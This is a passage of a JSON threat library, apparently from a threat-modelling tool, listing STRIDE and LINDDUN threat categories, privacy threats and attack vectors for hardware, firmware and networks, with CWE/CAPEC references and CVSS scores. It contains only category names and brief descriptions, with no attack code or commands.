Misuse","Description":"","threatCategorieIDs":["2dcb00d0-d8a3-4dbc-9efa-d33783a8106b","f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","6de4f75a-bc96-4f32-b18f-867eac0e8fda","9e715340-1a69-47df-864a-7c3b5a9a678e","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},{"ID":"415f75e3-24f1-4d5f-9e0b-9e66b134d728","Name":"Attack Preparation / Persistence","Description":"","threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","c8a14b27-b13f-4358-9f3f-691d01c97c77","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},{"ID":"08340ecc-e53f-4ab6-8573-af18bcce9e92","Name":"Damage / Destruction / Harm / Loss","Description":"","threatCategorieIDs":["88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0","3915215b-3414-4b2e-8446-9763398790ec","a6a57921-7fcb-4f54-b0f5-bac0a0f74163","bc4b439c-6197-48d3-a308-7fd323d2ea5e","6b8c08cb-3f02-413a-96b4-179bb1f67997","4d0bb854-2843-4d47-8b2c-043f7b8e4b4f","08d8fbba-5de4-4538-8674-43e214c3ebad"]},{"ID":"d44618e3-6f7e-48bd-ba5d-9cef76e4de29","Name":"Espionage / Interception / Tampering","Description":"","threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","61d04f2d-83b1-4152-9aba-4ad188eef06d","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},{"ID":"8cc887d4-ac13-4e73-a683-9ce3f7d108a2","Name":"Intellectual Property Theft","Description":"","threatCategorieIDs":["ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d","70d07015-4eda-4d1a-8d07-1791f881f8f0","2e50cdf4-cc94-4a32-98ee-825028a1f476"]},{"ID":"2c19e683-971c-4389-bf96-3963e6a1dd56","Name":"Legal","Description":"","threatCategorieIDs":["3bdf3019-02dd-4c7f-bffc-90189b39e6a7","180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","647ed950-8b8a-4a3f-b3f0-d9967c7d218f"]},{"ID":"6fb5aeac-180b-4ed5-b246-ad888cfd91aa","Name":"Malfunction / Failure","Description":"","threatCategorieIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","0285f001-a384-42de-ae6d-6bfbc488c92c","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","b7935cfe-6a41-45e4-8778-f0fbb1e4018b","5f7607f8-e67d-40f2-a902-33c6cfe298c3","3fb90b77-a990-4d5b-bb8a-fce5e36d8f71"]},{"ID":"fdbef5e1-5195-4c19-9059-918c81091003","Name":"Outage","Description":"","threatCategorieIDs":["f2b91aaf-7d9f-4baf-8713-13d7625174d9","bafd3162-d833-4bf4-beb8-ce95239cb4b4","2c064bb4-aa49-4e20-ad72-333748a5e497","7cf3480c-f4db-47cb-be36-b27deb746c64"]},{"ID":"1f2b7a03-b882-47d8-a6c0-ae693145a60a","Name":"Privacy","Description":"","threatCategorieIDs":["bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","d6eafa9e-6d9d-42aa-a734-0eb11f25607b","11a5c06f-875c-43fa-a01f-79f4819f98dd","787846f0-3f3c-4807-a99d-881383591051","2765e61e-29a9-498e-adf8-4d653f488e3d","af3ee78e-9e83-4bd1-b9b5-13ec28765518","e6ba8518-0074-492c-95e5-ebe89fa601fe"]},{"ID":"a07a29b8-0414-4d10-bf57-71dcb697d734","Name":"Unintentional / Disaster","Description":"","threatCategorieIDs":["21a0d68d-6bc3-4d4b-8ccb-98b70adc07a6","d9a0d5d5-0c36-45df-9815-ae89ec254677"]},{"ID":"0f772ed4-0e03-4ddc-8e4d-200422c299c3","Name":"STRIDE","Description":"","threatCategorieIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","f0e814f3-b3d2-4357-b155-8fffd70ec42e","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},{"ID":"8bd271b7-2f94-4d3d-baae-d59d2b1fa78c","Name":"LINDDUN","Description":"","threatCategorieIDs":["55379fba-d815-4e29-bd4b-9aa674ed6821","5278c995-f9d9-410e-b012-2995ba30c353","700f5437-7d03-4bff-a0e6-50cfb82dc0e5","b98738a0-f79e-4b1e-86df-0e716eb61bc0","da86b5fc-d15d-41f7-a98f-01fe5e143651","aead4d1d-0f64-42b4-a512-cbbc979af3ca","2521b219-3d43-4fd8-bf96-d658eea44d01"]},{"ID":"dd59986c-693d-43ae-8c4f-2b2bb76a60ec","Name":"Safety & Privacy","Description":"","threatCategorieIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1","7bbfe5d3-8a91-4210-99ab-79f670715e61"]}],"threatCategories":[{"ID":"6de4f75a-bc96-4f32-b18f-867eac0e8fda","Name":"Misuse of computing power","Description":"Starting DDoS attacks; Sending spam mails; Mining of crypto currencies","ImpactCats":[12,13,14,15]},{"ID":"9e715340-1a69-47df-864a-7c3b5a9a678e","Name":"Misuse of electrical power","Description":"Charging the phone; Rewiring to other equipment","ImpactCats":[12,13,14,15]},{"ID":"c46b7c74-5979-409d-8ceb-631b8833c596","Name":"Obtaining of access/control","Description":"","ImpactCats":[4]},{"ID":"c8a14b27-b13f-4358-9f3f-691d01c97c77","Name":"Obtaining of higher priviliges","Description":"","ImpactCats":[4]},{"ID":"b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a","Name":"Keeping access/control","Description":"","ImpactCats":[4]},{"ID":"2dcb00d0-d8a3-4dbc-9efa-d33783a8106b","Name":"Abuse of personal data","Description":"","ImpactCats":[10,13,8,1]},{"ID":"f19e41bd-9fd9-4046-a195-28d441207fa0","Name":"Code/Data tampering/poisoning","Description":"Manipulating the system in order to make it work (slightly) different","ImpactCats":[2]},{"ID":"b869918c-0b47-45c3-8fab-0b698043aa66","Name":"Denial of service","Description":"Putting the system in a state in which it can\'t fulfill it\'s service (e.g., setting invalid configurations, flooding with network requests)","ImpactCats":[3,9,14,15]},{"ID":"6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","Name":"Information disclosure/leaking","Description":"Extracting (secret) information to unauthorized users","ImpactCats":[1,10]},{"ID":"4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","Name":"Privilege abuse","Description":"Reading data/logs to monitor other users; Using insider knowledge for personal gain (e.g., stock trading)","ImpactCats":[1,10,4]},{"ID":"c17cbe5c-3210-42fc-be1e-05f1f915865b","Name":"Repudiation of actions","Description":"Denying performed actions or usage of the system","ImpactCats":[6]},{"ID":"ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d","Name":"Hardware IP theft","Description":"","ImpactCats":[12]},{"ID":"70d07015-4eda-4d1a-8d07-1791f881f8f0","Name":"Software IP theft","Description":"","ImpactCats":[12]},{"ID":"2e50cdf4-cc94-4a32-98ee-825028a1f476","Name":"Process IP theft","Description":"","ImpactCats":[12]},{"ID":"88d19822-b1b0-469f-ae00-1bc600ccaa1d","Name":"Hardware destruction","Description":"","ImpactCats":[3,9,12,14,15]},{"ID":"644f8521-6b49-41bc-86df-4064b89fb881","Name":"Software destruction","Description":"","ImpactCats":[2,3,12,14,15]},{"ID":"96bdc11d-dbb0-4785-8a5c-373e2c492eb0","Name":"Data destruction","Description":"","ImpactCats":[2,3,12,14,15]},{"ID":"3915215b-3414-4b2e-8446-9763398790ec","Name":"Environmental damage","Description":"","ImpactCats":[13]},{"ID":"a6a57921-7fcb-4f54-b0f5-bac0a0f74163","Name":"Financial loss","Description":"","ImpactCats":[12]},{"ID":"bc4b439c-6197-48d3-a308-7fd323d2ea5e","Name":"Human harm","Description":"","ImpactCats":[9]},{"ID":"6b8c08cb-3f02-413a-96b4-179bb1f67997","Name":"Property loss/theft","Description":"","ImpactCats":[12]},{"ID":"4d0bb854-2843-4d47-8b2c-043f7b8e4b4f","Name":"Reputational damage","Description":"","ImpactCats":[13]},{"ID":"08d8fbba-5de4-4538-8674-43e214c3ebad","Name":"Waste of resources","Description":"","ImpactCats":[12]},{"ID":"8a3d81d9-3317-4e5d-88fe-a0e0592295fe","Name":"Traffic sniffing","Description":"","ImpactCats":[1]},{"ID":"d0bcd70c-fbad-4a16-a606-8b0682ae7afe","Name":"Identity and data spoofing","Description":"","ImpactCats":[5,2]},{"ID":"61d04f2d-83b1-4152-9aba-4ad188eef06d","Name":"Surveillance","Description":"","ImpactCats":[1,10]},{"ID":"f7639a0c-e85b-4947-bbec-2ac4a0911827","Name":"Traffic data tampering","Description":"","ImpactCats":[2]},{"ID":"3bdf3019-02dd-4c7f-bffc-90189b39e6a7","Name":"Breach of service-level agreement","Description":"","ImpactCats":[11]},{"ID":"180a9034-735c-44ca-a96a-693cb48ffaa7","Name":"Breach of legislation","Description":"","ImpactCats":[11]},{"ID":"1180824d-9f8a-4a4a-8398-3775c541a360","Name":"Loss of compliance","Description":"","ImpactCats":[11]},{"ID":"647ed950-8b8a-4a3f-b3f0-d9967c7d218f","Name":"Unauthorized use of copyright material","Description":"","ImpactCats":[11]},{"ID":"f2ba26f4-b2da-49a8-aba2-14e42a746d6a","Name":"Application malfunction","Description":"","ImpactCats":[2,9,15]},{"ID":"0285f001-a384-42de-ae6d-6bfbc488c92c","Name":"AI application malfunction","Description":"","ImpactCats":[2,9,15]},{"ID":"f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","Name":"Communication malfunction","Description":"","ImpactCats":[2,3,9,15]},{"ID":"b7935cfe-6a41-45e4-8778-f0fbb1e4018b","Name":"Process malfunction","Description":"","ImpactCats":[2,3,9,15]},{"ID":"5f7607f8-e67d-40f2-a902-33c6cfe298c3","Name":"Hardware failure","Description":"","ImpactCats":[2,3,9,15]},{"ID":"3fb90b77-a990-4d5b-bb8a-fce5e36d8f71","Name":"Software failure","Description":"","ImpactCats":[2,3,9,15]},{"ID":"f2b91aaf-7d9f-4baf-8713-13d7625174d9","Name":"Communication outage","Description":"","ImpactCats":[3,15]},{"ID":"bafd3162-d833-4bf4-beb8-ce95239cb4b4","Name":"Infrastructure outage","Description":"","ImpactCats":[3,15]},{"ID":"2c064bb4-aa49-4e20-ad72-333748a5e497","Name":"Loss of support services","Description":"","ImpactCats":[3,15]},{"ID":"7cf3480c-f4db-47cb-be36-b27deb746c64","Name":"Power outage","Description":"","ImpactCats":[3,15]},{"ID":"21a0d68d-6bc3-4d4b-8ccb-98b70adc07a6","Name":"Environmental conditions","Description":"ToDo: Corrosion, Frostiness, Heat/Fire, Mechanical stress, Over-voltage, Low-voltage, Water, Moisture, Pollution","ImpactCats":[3,15]},{"ID":"d9a0d5d5-0c36-45df-9815-ae89ec254677","Name":"Natural disasters","Description":"","ImpactCats":[3,15]},{"ID":"bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","Name":"Identification","Description":"Identification denotes the threat of associating a (persistent) identifier, e.g. a name and address or a pseudonym of any kind, with an individual and data about him.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"d6eafa9e-6d9d-42aa-a734-0eb11f25607b","Name":"Inventory attacks","Description":"Inventory attacks refer to the unauthorized collection of information about the existence and characteristics of personal things.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"11a5c06f-875c-43fa-a01f-79f4819f98dd","Name":"Lifecycle transitions","Description":"Privacy is threatened when smart things disclose private information during changes of control spheres in their lifecycle.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"787846f0-3f3c-4807-a99d-881383591051","Name":"Linkage","Description":"This threat consists in linking different previously separated systems such that the combination of data sources reveals (truthful or erroneous) information that the subject did not disclose to the previously isolated sources and, most importantly, also did not want to reveal.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"2765e61e-29a9-498e-adf8-4d653f488e3d","Name":"Localization and tracking","Description":"Localization and tracking is the threat of determining and recording a person\u2019s location through time and space.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"af3ee78e-9e83-4bd1-b9b5-13ec28765518","Name":"Privacy-violating interaction and presentation","Description":"This threat refers to conveying private information through a public medium and in the process disclosing it to an unwanted audience. It can be loosely sketched as shoulder- surfing but in real-world environments.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"e6ba8518-0074-492c-95e5-ebe89fa601fe","Name":"Profiling","Description":"Profiling denotes the threat of compiling information dossiers about individuals in order to infer interests by correlation with other profiles and data.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"3bbe354c-317a-4f76-bdbb-75543b5d5aa4","Name":"Spoofing","Description":"","ImpactCats":[5]},{"ID":"f0e814f3-b3d2-4357-b155-8fffd70ec42e","Name":"Tampering","Description":"","ImpactCats":[2]},{"ID":"a77f314c-f74e-4340-a993-5a1a24f26db4","Name":"Repudiation","Description":"","ImpactCats":[6]},{"ID":"369640cc-1b53-4a2e-9e3b-a74c187e68e7","Name":"Information disclosure","Description":"","ImpactCats":[1]},{"ID":"422b9042-212d-4467-a000-2528a2e09f8b","Name":"Denial of Service","Description":"","ImpactCats":[3]},{"ID":"8687e614-c127-418b-8fda-536bb2f0708f","Name":"Elevation of Privileges","Description":"","ImpactCats":[4]},{"ID":"c0bd6e2f-9784-4c11-9aee-115a966e0a4d","Name":"Execution of unauthorized code","Description":"","ImpactCats":[1,2,3,4,5,6,9,10]},{"ID":"55379fba-d815-4e29-bd4b-9aa674ed6821","Name":"Linkability","Description":"An adversary is able to link two items of interest without knowing the identity of the data subject(s) involved.","ImpactCats":[10]},{"ID":"5278c995-f9d9-410e-b012-2995ba30c353","Name":"Identifiability","Description":"An adversary is able to identify a data subject from a set of data subjects through an item of interest.  \u200b","ImpactCats":[10]},{"ID":"700f5437-7d03-4bff-a0e6-50cfb82dc0e5","Name":"Non-Repudiation","Description":"The data subject is unable to deny a claim (e.g., having performed an action, or sent a request).","ImpactCats":[10]},{"ID":"b98738a0-f79e-4b1e-86df-0e716eb61bc0","Name":"Detectability","Description":"An adversary is able to distinguish whether an item of interest about a data subject exists or not, regardless of being able to read the contents itself.","ImpactCats":[10]},{"ID":"da86b5fc-d15d-41f7-a98f-01fe5e143651","Name":"Disclosure of Information","Description":"An adversary is able to learn the content of an item of interest about a data subject.","ImpactCats":[10,1]},{"ID":"aead4d1d-0f64-42b4-a512-cbbc979af3ca","Name":"Unawareness","Description":"The data subject is unaware of the collection, processing, storage, or sharing activities (and corresponding purposes) of the data subject\u2019s personal data.","ImpactCats":[10]},{"ID":"2521b219-3d43-4fd8-bf96-d658eea44d01","Name":"Non-Compliance","Description":"The processing, storage, or handling of personal data is not compliant with legislation, regulation, and/or policy.","ImpactCats":[10]},{"ID":"17a04fbd-365f-4345-97f8-88d3c7382ec1","Name":"Safety","Description":"Threats threatening the safety of operation, humans, and machines","ImpactCats":[9]},{"ID":"7bbfe5d3-8a91-4210-99ab-79f670715e61","Name":"Privacy","Description":"Threats threatening the privacy","ImpactCats":[10]}],"attackVectorGroups":[{"ID":"e17870ae-2c37-435c-a284-8df90ff7a5f0","Name":"Threat Library","Description":"","attackVectorGroupIDs":["037c0934-3db3-4320-a580-3581ec92f627","4e160ff0-f1c9-4d2b-a470-6b23ab9c8868","bee6117a-63ee-41b5-b77a-dd2b2b25cec8","a1ddc171-0321-4131-ae58-25b39006320a","e112d000-a2e3-40c0-acdc-1b7856ad99e0","fa6a378a-0e74-43b0-960b-b37576081160","29a5994a-1de4-46e2-94c4-3b9832fff28e","e98488d0-f4ac-49ad-8648-d32ae9563225","1a63ed36-ee55-4773-89d5-8cd466f34cad","98dacc1a-f9e4-46b0-84c2-8718d9301cbb"],"attackVectorIDs":[]},{"ID":"037c0934-3db3-4320-a580-3581ec92f627","Name":"Cryptography Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["0ffd675d-d83c-4f74-8835-398e7f3930cb","31f89637-4b8a-41e9-acac-9d012767a424","97b5a1d4-be82-4485-82f6-e4532795a20b","a20d6e53-4426-4700-a04f-a4018bc7bfce","680ceebd-357c-49d6-8bfd-390dc6c51dde","a0729a41-bcc9-43d8-9c86-bfb26c64e93c","04d5f07e-2482-451b-9e24-94cb650da53b"]},{"ID":"4e160ff0-f1c9-4d2b-a470-6b23ab9c8868","Name":"Network Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["e58fcbde-e429-4704-9f22-c00d187994bc","8f9a24d4-e962-4136-b0ec-8e9f797a6f62","23c3a785-a539-4570-aee0-42bdffb43983","0b47795b-b42d-49d1-bf50-7f4889994fea","bb7358c1-e5b6-424f-962d-daab17345b63","001ba17c-0400-4369-912e-0ceda3ccd227","1447713d-9ad6-454e-81d8-c9f4ef34c72b","f5949698-47d4-48ee-a116-2d212695c41f","b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","c7787e71-5c70-462c-9558-ce20e7cfdfe8","4e007b60-94e7-4df3-b3bd-109eb8627da2"]},{"ID":"bee6117a-63ee-41b5-b77a-dd2b2b25cec8","Name":"Chip-Level Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["b703d3d9-1f29-480a-b7ad-b11716727a91","8a6476b9-7a5c-4306-bd43-db6fe32bbf66","1a99fb9b-d1f0-4215-93a6-5cd9fd272026","9e85cf25-febb-46ca-a5f5-c6283412a87b","c097b67f-1179-4f30-924c-3a4e54c04d9d","d4292863-c64e-4123-806f-71590ec76ed3","e6c3d6f5-f4c7-48b7-b516-2092c3557c81"]},{"ID":"a1ddc171-0321-4131-ae58-25b39006320a","Name":"PCB-Level Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["f6ddb913-05ab-485a-a736-46a3f7466f85","5605adab-044a-4b1f-9344-90a602d8d448","e851a284-6b41-41c9-9efd-dc8b01f788da","be14adbc-19a7-48c8-8f13-2566559e63e2","915f674e-926b-4bd9-94cb-ee8b4637bc80","184cd5e5-2517-4d7f-a81a-c411942d3601"]},{"ID":"53298967-848a-4d3f-8577-a54d76942a8e","Name":"Sub Group","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":[]},{"ID":"c3c1c9ff-637f-4964-8de5-994de73927f8","Name":"Sub Sub Group","Description":"","attackVectorGroupIDs":["dbbb888b-1a29-4ba4-8245-9af87316f4f9"],"attackVectorIDs":[]},{"ID":"dbbb888b-1a29-4ba4-8245-9af87316f4f9","Name":"Sub Sub Sub Group","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":[]},{"ID":"e112d000-a2e3-40c0-acdc-1b7856ad99e0","Name":"Firmware Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["99864969-3b71-45ad-bae5-09bc4ecc5cc1","24645edb-85ac-438b-9033-ba2721c3e2c7","5656f112-8443-4245-aa38-38cd9d9375e0","f0a8edb7-d65f-423f-a391-120d1eb04e02","01a37617-b7ac-446a-86fa-e70c957d154c","97c0d7a1-13c7-43d5-b03c-75845f973af5","ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","c23a62c8-901a-412b-80b8-d2574103b733","83d23b79-71c5-488e-adb2-dd0f76d70f44","f170308a-c188-4ae0-bcef-d04af1e429b3","eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0"]},{"ID":"fa6a378a-0e74-43b0-960b-b37576081160","Name":"Application Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["7dc1eb8e-2312-4b2f-becf-f9725d45cdce","d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","1a511f9e-5d1b-47b9-9071-4d39407cc75c","9538abd8-f79c-4097-b2dd-716e50a125ee","573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","a76b8768-9d68-4074-b5e1-0f9abc61bcda","cf63f187-4353-4bf8-bc37-a7392c6d91bf","66c5f951-6286-4b22-a71a-ee4d6232f689","06c24920-2ce3-49ca-8134-9fa81fb2cdef","71f761e4-8149-4a88-92fd-35f9d99cc0ef","6bf04ffa-1f83-4637-a866-d02ff10d752b","e36eff83-1863-4026-bffe-966a9a104331","6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ed84da5f-3181-4be1-bef4-d911077b1910","b26fc3e4-7a38-4f00-acdb-ec78246d0b25","3162421f-ca5b-400d-bbe8-58a510be9abf","b48781b2-24a2-481b-b7c1-3390dbeeb973","e060675a-41d0-4c4d-9e16-311bb4adec7b"]},{"ID":"29a5994a-1de4-46e2-94c4-3b9832fff28e","Name":"Supply Chain Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["327a2f35-8cf5-46d5-a973-a174f6f7be23","90a4e8f3-c750-47c4-97fd-fa9e25b9b599","21c6b5ef-82c7-41e5-bb07-de93445b2156","a912b48a-3b4d-44ab-b8f3-28000ca945c4"]},{"ID":"e98488d0-f4ac-49ad-8648-d32ae9563225","Name":"Ecosystem Weaknesses","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["30cf5142-2339-4130-8a6e-2b05869e6df2","afd4bceb-31b0-41cd-9eae-02d2eba6b41c","7742f998-ab1e-4f64-8ac6-12b3f97b936a"]},{"ID":"1a63ed36-ee55-4773-89d5-8cd466f34cad","Name":"User Behavior","Description":"","attackVectorGroupIDs":["abf604c4-90f4-41fe-9084-dd2c655d12e8"],"attackVectorIDs":["195d942e-02f8-49ad-873f-299f4b4ad4ec","ffd6083b-7183-472c-b250-15b0de223735"]},{"ID":"98dacc1a-f9e4-46b0-84c2-8718d9301cbb","Name":"Credential Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["f0ef09ed-0cde-4b12-beb6-f1640132f3e6","0e3c0e3e-1587-46f8-93ea-e9091dff5958","b9436449-7896-4be6-89f8-a19e1c8d014f","5435aa9a-ad52-470f-8fa5-81a4f926b6a6","723dfb40-4ceb-4232-bda5-73bcb3c76ac0","5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","63dfaefa-c8a8-4725-b6d6-2efff7306639","296e95fe-e06d-4ae3-be84-da98df4a122c","4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","bf289171-82c3-431a-b3f1-28d17e5a6546","2f483201-0209-4320-ba2e-2d692274aab5","05e04798-41ce-4919-a92b-264f7e985de2","0217b20a-5e3a-4244-8dce-819e28050a47","1909127e-50bd-4892-8b1f-1a2123a4fa61"]},{"ID":"abf604c4-90f4-41fe-9084-dd2c655d12e8","Name":"Social Engineering","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["cf948333-b659-40ff-b93f-d4bdc8c980d1"]}],"attackVectors":[{"ID":"0ffd675d-d83c-4f74-8835-398e7f3930cb","Name":"Insufficient random values","Description":"Use of insufficiently random values","OriginTypes":[1],"ThreatIntroduced":["C","I"],"Weakness":{"CWEID":330},"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"ThreatExploited":["O"],"Severity":2},{"ID":"e58fcbde-e429-4704-9f22-c00d187994bc","Name":"Man-in-the-Middle attack","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["I"],"AttackTechnique":{"CAPECID":94,"CVSS":{"AV":"N","AC":"L","PR":"N","UI":"N","S":"U","C":"H","I":"H","A":"L","Score":9.4,"Notes":{}}},"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"ThreatExploited":["O"],"Severity":4},{"ID":"f6ddb913-05ab-485a-a736-46a3f7466f85","Name":"Reverse engineering/Cloning","Description":"Extracting the PCB design to understand or clone the product; e.g., by CAD file theft or modern reverse engineering techniques","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":[],"AttackTechnique":{"CVSS":{"AV":"P","AC":"L","PR":"N","UI":"N","S":"","C":"H","I":"L","A":"N","Score":5.2}},"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"ThreatExploited":["I","P","O"],"Severity":2},{"ID":"b703d3d9-1f29-480a-b7ad-b11716727a91","Name":"Hardware trojan","Description":"Malicious design modification / insertion of a hardware Trojan","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["C","I","P"],"Adversaries":"Untrusted foundry, untrusted IP vendor, untrusted CAD tool, untrusted design facilities","threatCategorieIDs":[],"ThreatExploited":["O"],"AttackTechnique":{"CAPECID":539,"CVSS":{}},"Severity":3},{"ID":"99864969-3b71-45ad-bae5-09bc4ecc5cc1","Name":"Firmware not updatable","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1277},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":4},{"ID":"31f89637-4b8a-41e9-acac-9d012767a424","Name":"Risky crypto implementation","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1240},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"],"ThreatExploited":["O"],"Severity":3},{"ID":"8a6476b9-7a5c-4306-bd43-db6fe32bbf66","Name":"Improper debug access control","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1191},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"1a99fb9b-d1f0-4215-93a6-5cd9fd272026","Name":"Internal asset exposure","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1244},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"9e85cf25-febb-46ca-a5f5-c6283412a87b","Name":"Improper restriction to hardware features","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1256},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"24645edb-85ac-438b-9033-ba2721c3e2c7","Name":"Overlap between protected memory ranges","Description":"","OriginTypes":[1],"Weakness":{},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"5656f112-8443-4245-aa38-38cd9d9375e0","Name":"Sensitive information uncleared","Description":"Sensitive information in memory (SRAM) must be cleared when the system performs a power or debug state transition. For example, SRAMs keep their data after a software reset.","OriginTypes":[1],"Weakness":{"CWEID":1272},"ThreatIntroduced":["I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"f0a8edb7-d65f-423f-a391-120d1eb04e02","Name":"Boot code protection","Description":"Manipulation of boot code in volatile memory to bypass secure boot.","OriginTypes":[1],"Weakness":{"CWEID":1274},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":3},{"ID":"c097b67f-1179-4f30-924c-3a4e54c04d9d","Name":"Physical side channel attacks","Description":"Physical side channels expose sensitive information due to patterns in physically observable phenomena such as variations in power consumption, electromagnetic emissions, or acoustic emissions.","OriginTypes":[1],"Weakness":{"CWEID":1300},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"5605adab-044a-4b1f-9344-90a602d8d448","Name":"Firmware dumping","Description":"Extracting the firmware via physical interfaces","OriginTypes":[1],"Weakness":{"CWEID":1324},"ThreatIntroduced":["P"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"],"Severity":3},{"ID":"01a37617-b7ac-446a-86fa-e70c957d154c","Name":"Firmware overwrite","Description":"Overwriting the firmware via a physical 